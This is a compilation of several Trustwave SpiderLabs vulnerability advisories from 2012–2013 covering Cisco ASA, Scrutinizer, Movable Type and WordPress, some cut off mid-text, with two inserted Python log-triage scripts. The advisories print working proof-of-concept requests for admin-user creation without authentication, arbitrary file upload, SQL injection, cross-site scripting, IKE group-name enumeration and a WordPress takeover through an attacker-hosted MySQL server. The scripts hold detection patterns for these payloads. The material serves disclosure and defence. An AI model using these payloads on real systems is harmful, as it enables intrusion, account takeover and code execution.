TWSL2013-004: Group Name Enumeration Vulnerability in Cisco IKE Implementation

2013-04-19 Thread Trustwave Advisories
Trustwave SpiderLabs Security Advisory TWSL2013-004:
Group Name Enumeration Vulnerability in Cisco IKE Implementation

https://www.trustwave.com/spiderlabs/advisories/TWSL2013-004.txt

Published: 04/18/13
Version: 1.0

Vendor: Cisco (www.cisco.com)
Product: ASA (Adaptive Security Appliance)
Versions affected: 8.4(2), 8.4(5), 9.1(1)

Product description:
The Cisco ASA 5505 Adaptive Security Appliance is a next-generation,
full-featured security appliance for small business, branch office, and
enterprise teleworker environments. The Cisco ASA 5505 delivers
high-performance firewall, SSL and IPsec VPN, and rich networking services
in a modular, plug-and-play appliance.


Finding 1: Group Name Enumeration
Credit: Daniel Turner of Trustwave SpiderLabs
CVE: CVE-2013-1194
CWE: CWE-206

Each VPN configuration is assigned a group name, which is used to manage
separate Security Associations. Previous advisories have found that when a
VPN endpoint is configured to allow Aggressive Mode IKE negotiations using
PSK, a hash of the PSK can be captured and potentially cracked offline. In
order to successfully crack this hash a correct group name is required.

The above product versions are susceptible to a group name enumeration
vulnerability, because of a difference in the way the device responds to
correct and incorrect group names sent in the initial exchange packet.

This is similar to CSCeg00323 and CSCtj96108, where enumeration was possible
because of no response and a response containing a DPD payload respectively.
It has been found that it remains possible to distinguish a correct group
name by the number of response packets sent by the device. A correct group
name elicits three attempts to continue the handshake and an additional
encrypted phase 2 packet, while the device will only respond twice to an
incorrect group name. Enumeration is slow because of the requirement to wait
for the responding packets, but it has been successfully accomplished. Below
are examples of the different responses:

Example 1:

#Request using invalid group name

ike-scan 10.70.70.25 -M -A --id=incorrectgroup

#Response using invalid group name

13:22:59.929273 IP 10.70.70.204.isakmp > 10.70.70.25.isakmp: isakmp: phase 1 I agg
13:22:59.932624 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 1 R agg
13:23:05.696571 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 1 R agg

Example 2:

#Request using valid group name

ike-scan 10.70.70.25 -M -A --id=correctgroup

#Response using valid group name

13:23:05.693673 IP 10.70.70.204.isakmp > 10.70.70.25.isakmp: isakmp: phase 1 I agg
13:23:13.690392 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 1 R agg
13:23:21.690464 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 1 R agg
13:23:29.690528 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 1 R agg
13:23:37.691275 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 2/others R inf[E]

This information can be used to capture and crack a weak PSK if Aggressive
Mode is enabled.
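Added example (not part of the advisory): a small Python triage script for the one-line tcpdump format shown above. It aggregates ISAKMP summary lines per remote peer and flags peers that repeatedly open aggressive-mode exchanges they never complete, which is exactly what makes the ASA keep retransmitting; the capture lines are constructed and the probe threshold is an assumption.

```python
import re
from collections import defaultdict

# Constructed tcpdump lines in the one-line format shown in the advisory.
# 192.0.2.1 stands in for the ASA, 203.0.113.7 for a host guessing group
# names (four probes, one of them a hit), 198.51.100.5 for a normal client.
SAMPLE_CAPTURE = """\
13:22:59.929273 IP 203.0.113.7.isakmp > 192.0.2.1.isakmp: isakmp: phase 1 I agg
13:22:59.932624 IP 192.0.2.1.isakmp > 203.0.113.7.isakmp: isakmp: phase 1 R agg
13:23:05.696571 IP 192.0.2.1.isakmp > 203.0.113.7.isakmp: isakmp: phase 1 R agg
13:23:12.100000 IP 203.0.113.7.isakmp > 192.0.2.1.isakmp: isakmp: phase 1 I agg
13:23:12.103000 IP 192.0.2.1.isakmp > 203.0.113.7.isakmp: isakmp: phase 1 R agg
13:23:18.200000 IP 192.0.2.1.isakmp > 203.0.113.7.isakmp: isakmp: phase 1 R agg
13:23:25.000000 IP 203.0.113.7.isakmp > 192.0.2.1.isakmp: isakmp: phase 1 I agg
13:23:25.003000 IP 192.0.2.1.isakmp > 203.0.113.7.isakmp: isakmp: phase 1 R agg
13:23:31.100000 IP 192.0.2.1.isakmp > 203.0.113.7.isakmp: isakmp: phase 1 R agg
13:23:38.000000 IP 203.0.113.7.isakmp > 192.0.2.1.isakmp: isakmp: phase 1 I agg
13:23:38.003000 IP 192.0.2.1.isakmp > 203.0.113.7.isakmp: isakmp: phase 1 R agg
13:23:46.000000 IP 192.0.2.1.isakmp > 203.0.113.7.isakmp: isakmp: phase 1 R agg
13:23:54.000000 IP 192.0.2.1.isakmp > 203.0.113.7.isakmp: isakmp: phase 1 R agg
13:24:02.000000 IP 192.0.2.1.isakmp > 203.0.113.7.isakmp: isakmp: phase 2/others R inf[E]
13:30:00.000000 IP 198.51.100.5.isakmp > 192.0.2.1.isakmp: isakmp: phase 1 I agg
13:30:00.010000 IP 192.0.2.1.isakmp > 198.51.100.5.isakmp: isakmp: phase 1 R agg
13:30:00.050000 IP 198.51.100.5.isakmp > 192.0.2.1.isakmp: isakmp: phase 1 I agg
13:30:00.100000 IP 198.51.100.5.isakmp > 192.0.2.1.isakmp: isakmp: phase 2/others I oakley-quick[E]
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>\S+)\.isakmp > (?P<dst>\S+)\.isakmp: "
    r"isakmp: phase (?P<phase>1|2/others) (?P<role>[IR]) (?P<kind>\S+)$"
)


def summarize(capture_lines):
    """Per remote peer, count aggressive-mode initiations it sent, phase-1
    responder packets sent back to it, and phase-2 packets in either direction."""
    stats = defaultdict(lambda: {"p1_init": 0, "p1_resp": 0, "p2": 0})
    for line in capture_lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not an ISAKMP summary line
        src, dst, phase, role, kind = (m.group(k) for k in ("src", "dst", "phase", "role", "kind"))
        if phase == "1" and role == "I" and kind == "agg":
            stats[src]["p1_init"] += 1
        elif phase == "1" and role == "R":
            stats[dst]["p1_resp"] += 1
        elif phase.startswith("2"):
            peer = src if role == "I" else dst
            stats[peer]["p2"] += 1
    return dict(stats)


def flag_enumerators(capture_lines, min_probes=3):
    """Peers matching the advisory's pattern: repeated aggressive-mode
    initiations that are never followed up, so the responder retransmits and
    ends up sending more phase-1 packets than the initiator did. A normal
    client answers the responder, so its responder count stays low."""
    flagged = []
    for peer, s in summarize(capture_lines).items():
        abandoned = s["p1_resp"] > s["p1_init"]
        if s["p1_init"] >= min_probes and abandoned:  # threshold is an assumption
            flagged.append(peer)
    return sorted(flagged)


if __name__ == "__main__":
    lines = SAMPLE_CAPTURE.splitlines()
    for peer, s in summarize(lines).items():
        print(peer, s)
    print("suspected group-name guessing from:", flag_enumerators(lines))
```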

Remediation Steps:
The vendor will be releasing security fixes for the above issues; affected
versions can be patched by installing the 8.4(6) firmware or the 9.1(2)
firmware for the Cisco ASA platform. Administrators with other affected
firmware versions should be aware that this information could potentially be
revealed, and it is recommended that factory default or easily guessable
group names are not used.

Additional Credits:
Jonathan Claudius of Trustwave SpiderLabs: Confirmation of
Vulnerability/Behavior on Cisco ASA 8.4(5) and 9.1(1)

Revision History:
02/21/13 - Vulnerability disclosed
03/14/13 - Vendor acknowledges security issue
04/17/13 - Vendor releases security alert
04/18/13 - Advisory published

References
1. http://www.cisco.com/warp/public/707/cisco-sn-20050624-vpn-grpname.shtml
2. http://www.cisco.com/en/US/products/csr/cisco-sr-20101124-vpn-grpname.html
3. http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1194

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is 

TWSL2012-014: Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer

2012-07-30 Thread Trustwave Advisories
Trustwave SpiderLabs Security Advisory TWSL2012-014:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer

Published: 07/27/12
Version: 1.0

Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: 9.0.1 (Build 9.0.1.19899) confirmed; prior versions may be
affected as well. Please note that the software is bundled in a long list of
other products; visit
http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html
for the partial list.

Product description:
A network analysis tool that monitors overall network health and reports
which hosts, applications, protocols, etc. are consuming network bandwidth.

Credits:
Mario Ceballos of the Metasploit Project
Jonathan Claudius of Trustwave Spiderlabs

Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-2626

The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization are controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.

Example(s):

This request will add a user named trustwave with the password of
trustwave to the administrative user group.

#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) 
Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70

tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1

#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8

{"new_user_id":"2"}


Finding 2: Arbitrary File Upload Vulnerability
CVE: CVE-2012-2627

The Scrutinizer web console is prone to an unauthenticated arbitrary file
upload vulnerability. An attacker could exploit this vulnerability to upload
files to the affected system's file system, as well as to overwrite the
Scrutinizer application's SNMP configuration.

Example(s):

This request will upload a test file to the following location:

'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'

Note: The affected folder also contains SNMP configuration files, which could
be overwritten if an attacker were to select the right file name.

#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210


--_Part_949_3365333252_3066945593
Content-Disposition: form-data; name="uploadedfile"; filename="trustwave.txt"
Content-Type: application/octet-stream

trustwave

--_Part_949_3365333252_3066945593--

#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html

{"success":1,"file_name":"trustwave.txt"}

#Confirming on File System
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
trustwave


Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php
CVE: CVE-2012-3848

The Scrutinizer web console suffers from multiple Cross Site Scripting
vulnerabilities in the following pages:

1.) /d4d/contextMenu.php
2.) /d4d/exporters.php

These vulnerabilities include the following:

1.) XSS via arbitrary parameter
2.) XSS via Referer header

Example(s):

The following two examples demonstrate the above-mentioned vulnerabilities
on exporters.php.

#Request 1
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) 
Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive

#Response 1
snip
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
snip

#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
Content-Length: 2

#Response 2
snip
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
snip

Finding 4: Undocumented Default Admin MySQL Users
CVE: CVE-2012-3951

The Scrutinizer application relies on an underlying Apache, MySQL and PHP
installation which is installed as part of the scrutinizer installer

TWSL2012-008: Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer

2012-04-12 Thread Trustwave Advisories
Trustwave SpiderLabs Security Advisory TWSL2012-008:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer

https://www.trustwave.com/spiderlabs/advisories/TWSL2012-008.txt

Published: 04/11/12
Version: 1.0

Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: 8.6.2 (8.6.2.16204) confirmed; others may be vulnerable

Product description:
A network analysis tool that monitors overall network health and reports
which hosts, applications, protocols, etc. are consuming network bandwidth.

Credit: Tanya Secker of Trustwave SpiderLabs

Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-1258

The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization are controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.

Example:

This request will add a user named trustwave with the password of
trustwave to the administrative user group.

#Request
GET /cgi-bin/userprefs.cgi?newUser=trustwave&pwd=trustwave&selectedUserGroup=1&= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) 
Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

#Response
HTTP/1.1 200 OK
Date: Thu, 17 Nov 2011 10:19:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19

{"new_user_id":"9"}


Finding 2: SQL Injection
CVE: CVE-2012-1259

The Scrutinizer web console is prone to unauthenticated SQL Injection
attacks due to user input not being appropriately validated and passed
directly to the backend.  An attacker could exploit this vulnerability to
attempt to gain access to sensitive information within the database or to
perform other attacks on the system.

Example 1:

The requests and responses below show a blind SQL injection vector: the
proof of concept first returns a syntactically correct response from the
server (200 OK), followed by an incorrect one (500 Internal Server Error).

#Request 1
GET /cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=on&name%3anew7%3a7=on&name%3anew27%3a27=on&name%3anew13%3a13=on&standalone=&name%3anew5%3a5=on&name%3anew14%3a14=on&name%3anew9%3a9=on&user_id=&name%3anew23%3a23=on&name%3anew17%3a17=on&name%3anew11%3a11=on&name%3anew24%3a24=on&addip=')%20AND%20('a'='a&name%3anew18%3a18=on&name%3anew21%3a21=on&name%3anew19%3a19=on&name%3anew22%3a22=on&nbaupdate=1&name%3anew12%3a12=on&name%3anew25%3a25=on&name%3anew2%3a2=on&name%3anew1%3a1=on&name%3anew10%3a10=on&name%3anew15%3a15=on&name%3anew26%3a26=on&name%3anew4%3a4=on&name%3anew6%3a6=on HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi

#Response 1
HTTP/1.1 200 OK
Date: Tue, 31 Jan 2012 23:51:46 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 230

#Request 2
GET /cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=on&name%3anew7%3a7=on&name%3anew27%3a27=on&name%3anew13%3a13=on&standalone=&name%3anew5%3a5=on&name%3anew14%3a14=on&name%3anew9%3a9=on&user_id=&name%3anew23%3a23=on&name%3anew17%3a17=on&name%3anew11%3a11=on&name%3anew24%3a24=on&addip=')%20ANffD%20('a'='a&name%3anew18%3a18=on&name%3anew21%3a21=on&name%3anew19%3a19=on&name%3anew22%3a22=on&nbaupdate=1&name%3anew12%3a12=on&name%3anew25%3a25=on&name%3anew2%3a2=on&name%3anew1%3a1=on&name%3anew10%3a10=on&name%3anew15%3a15=on&name%3anew26%3a26=on&name%3anew4%3a4=on&name%3anew6%3a6=on HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi

#Response 2
HTTP/1.1 500 Internal Server Error
Date: Tue, 31 Jan 2012 23:52:18 GMT
Server: Apache
Last-Modified: Fri, 17 Dec 2010 02:01:03 GMT
ETag: 90001d93e-448-497918ae295c0
Accept-Ranges: bytes
Content-Length: 1096
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

Example 2:

The getPermissionsAndPreferences parameter in the following request is also
vulnerable to a blind time-based attack. The example payload included will
cause the server to delay approximately five seconds before returning a
response.

#Request
http://127.0.0.1/cgi-bin/login.cgi?getPermissionsAndPreferences=1%20AND%20SLEEP(5)&session_id=OyAOiECuFdtRbEBY&nocache=12_13_12_734
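Added example (not from either Scrutinizer advisory or from Plixer): a Python triage pass over Apache combined-format access logs that looks for the request shapes described in TWSL2012-008 and TWSL2012-014, namely user creation through userprefs.cgi or admin.cgi, POSTs to the unauthenticated uploader.php, SQL injection probes against scrut_fa_exclusions.cgi and login.cgi, and script tags reaching exporters.php or contextMenu.php through the query string or Referer. The log lines are constructed; the POST-body variant of the user-creation request is only visible if request bodies are logged.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-log lines modelled on the requests in the advisories
# (constructed sample data, not a real capture; 203.0.113.9 is the probing
# host, 198.51.100.4 a normal user).
SAMPLE_LOG = """\
203.0.113.9 - - [25/Apr/2012:17:52:15 +0000] "GET /cgi-bin/userprefs.cgi?newUser=trustwave&pwd=trustwave&selectedUserGroup=1 HTTP/1.1" 200 19 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Apr/2012:17:39:15 +0000] "POST /d4d/uploader.php HTTP/1.0" 200 41 "-" "Mozilla/4.0"
203.0.113.9 - - [31/Jan/2012:23:52:18 +0000] "GET /cgi-bin/scrut_fa_exclusions.cgi?addip=')%20AND%20('a'='a&nbaupdate=1 HTTP/1.1" 500 1096 "http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi" "Mozilla/4.0"
203.0.113.9 - - [31/Jan/2012:23:53:02 +0000] "GET /cgi-bin/login.cgi?getPermissionsAndPreferences=1%20AND%20SLEEP(5)&session_id=x HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.9 - - [25/Apr/2012:18:01:07 +0000] "GET /d4d/exporters.php HTTP/1.1" 200 3008 "http://D.E.F.G/search?hl=en&q=a%3Cscript%3Ealert(123)%3C/script%3E=1" "Mozilla/4.0"
198.51.100.4 - - [25/Apr/2012:18:05:00 +0000] "GET /d4d/exporters.php HTTP/1.1" 200 3008 "http://scrutinizer.example/index.php" "Mozilla/5.0"
198.51.100.4 - - [25/Apr/2012:18:05:09 +0000] "POST /cgi-bin/login.cgi HTTP/1.1" 200 140 "http://scrutinizer.example/index.php" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
# Markers taken from the advisory payloads: SLEEP( for the time-based probe,
# a quote followed by AND/OR for the boolean one, and a script tag for XSS.
SQLI_RE = re.compile(r"(?i)sleep\s*\(|'\s*\)?\s*(and|or)\b")
XSS_RE = re.compile(r"(?i)<\s*/?\s*script")

# (rule name, CVE(s) from the advisories, predicate over a parsed record)
RULES = [
    ("user creation via userprefs/admin CGI", "CVE-2012-1258 / CVE-2012-2626",
     lambda r: r["path"] in ("/cgi-bin/userprefs.cgi", "/cgi-bin/admin.cgi")
               and "newUser=" in r["query"]),
    ("POST to unauthenticated upload endpoint", "CVE-2012-2627",
     lambda r: r["path"] == "/d4d/uploader.php" and r["method"] == "POST"),
    ("SQL injection probe", "CVE-2012-1259",
     lambda r: r["path"] in ("/cgi-bin/scrut_fa_exclusions.cgi", "/cgi-bin/login.cgi")
               and SQLI_RE.search(r["query"])),
    ("script tag in query or Referer", "CVE-2012-3848",
     lambda r: r["path"] in ("/d4d/exporters.php", "/d4d/contextMenu.php")
               and (XSS_RE.search(r["query"]) or XSS_RE.search(r["referer"]))),
]


def parse_record(line):
    """Parse one combined-log line. Query string and Referer are
    percent-decoded so the patterns match what the application received."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {
        "ip": m.group("ip"), "method": m.group("method"), "path": path,
        "query": unquote_plus(query), "status": int(m.group("status")),
        "referer": unquote_plus(m.group("referer")),
    }


def triage(log_lines):
    """Return (ip, rule name, cve, status) for every line that matches a rule."""
    hits = []
    for line in log_lines:
        rec = parse_record(line)
        if rec is None:
            continue
        for name, cve, pred in RULES:
            if pred(rec):
                hits.append((rec["ip"], name, cve, rec["status"]))
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG.splitlines()):
        print(hit)
```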

Example 3:


TWSL2012-003: Cross-Site Scripting Vulnerability in Movable Type Publishing Platform

2012-02-27 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2012-003:
Cross-Site Scripting Vulnerability in Movable Type Publishing Platform

https://www.trustwave.com/spiderlabs/advisories/TWSL2012-003.txt

Published: 2012-02-24
Version: 1.0

Vendor: Six Apart (http://movabletype.org/)
Product: Movable Type
Version affected: Versions prior to 5.13, 5.07, and 4.38

Product description:
Movable Type is a weblog publishing system developed by the company Six
Apart. The software supports static page generation and includes
functionality, such as managing files, user roles, templates, tags,
categories, and trackback links.


Credit: Jonathan Claudius of Trustwave SpiderLabs

Finding 1: Cross-Site Scripting Vulnerability
CVE: CVE-2012-1262

After extracting the Movable Type CGI files and source files onto a web
server, but before the application is fully installed, cross-site scripting
vulnerabilities are present in the '/cgi-bin/mt/mt-wizard.cgi' page.

Example(s):

Performing XSS on dbuser parameter

#Request

POST /cgi-bin/mt/mt-wizard.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/cgi-bin/mt/mt-wizard.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 216

__mode=test&step=configure&set_static_uri_to=&default_language=en-us&config=&dbtype=mysql&dbserver=localhost&dbname=&dbuser=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&dbpass=test&dbpath=&dbport=&dbsocket=&test=1

#Response

--snip---
<p>Connection error: Access denied for user
'<script>alert('123')</script>'@'localhost' (using password: YES) at
/var/www/cgi-bin/mt/extlib/Data/ObjectDriver/Driver/BaseCache.pm line 320
--snip---


Vendor Response: These issues have been addressed as of versions 5.13, 5.07, 
and 4.38.


Remediation Steps: Customers should update to the latest version of the
Movable Type publishing platform in order to address these issues. The above
issues have been corrected in versions 5.13, 5.07, and 4.38.


Revision History:
01/11/12 - Vulnerability disclosed
02/21/12 - Patch released
02/24/12 - Advisory published

References
1. http://www.movabletype.org/2012/02/movable_type_513_507_and_438_security_updates.html



About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided as is without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

This transmission may contain information that is privileged, confidential, 
and/or exempt from disclosure under applicable law. If you are not the intended 
recipient, you are hereby notified that any disclosure, copying, distribution, 
or use of the information contained herein (including any reliance thereon) is 
STRICTLY PROHIBITED. If you received this 

TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2012-002:
Multiple Vulnerabilities in WordPress

https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt

Published: 1/24/12
Version: 1.0

Vendor: WordPress (http://wordpress.org/)
Product: WordPress
Version affected: 3.3.1 and prior

Product description:
WordPress is a free and open source blogging tool and publishing platform
powered by PHP and MySQL.

Credit: Jonathan Claudius of Trustwave SpiderLabs

Finding 1: PHP Code Execution and Persistent Cross Site Scripting
Vulnerabilities via 'setup-config.php' page.
CVE: CVE-2011-4899

The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. This typically requires a user
to have valid MySQL credentials to complete.  However, a malicious user can
host their own MySQL database server and can successfully complete the
WordPress installation without having valid credentials on the target system.

After the successful installation of WordPress, a malicious user can inject
malicious PHP code via the WordPress Themes editor. In addition, with control
of the database store, malicious JavaScript can be injected into the content
of WordPress, yielding persistent Cross Site Scripting.

Proof of Concept:

Servers Involved

A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User's MySQL Instance

1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306

2.) Malicious user performs POST/GET requests to install WordPress into that MySQL instance

Request #1
--
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81

dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit

Request #2
--
GET /wp-admin/install.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT

3.) Get PHP Code Execution

Malicious user edits 404.php via Themes Editor as follows:

<?php
phpinfo();
?>

Note #1: Any PHP file in the theme could be used.
Note #2: Depending on settings, PHP may be used to execute system commands
 on the web server.

The malicious user then performs a GET request for the modified page to execute the code.

Request
---
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1

4.) Get Persistent Cross Site Scripting

Malicious User Injects Malicious Javascript into their own MySQL database 
instance

MySQL Query
---
update wp_comments SET
comment_content='<script>alert(\'123\')</script>' where comment_content='Hi,
this is a comment.<br />To delete a comment, just log in and view the
post&#039;s comments. There you will have the option to edit or delete
them.';

A non-malicious user visits the WordPress installation and the JavaScript is
executed in their browser.

Request
---
GET /?p=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1



Finding 2: Multiple Cross Site Scripting Vulnerabilities in
'setup-config.php' page
CVE: CVE-2012-0782

The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. When using this installation page
the user is asked to supply the database name, the server that the database
resides on, and a valid MySQL username and password.

During this process, malicious users can supply JavaScript within
the dbname, dbhost or uname parameters. Upon clicking the submission
button, the JavaScript is rendered in the client's browser.

Proof of Concept:

Servers Involved

A.B.C.D = Target WordPress Web Server

Request
---
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
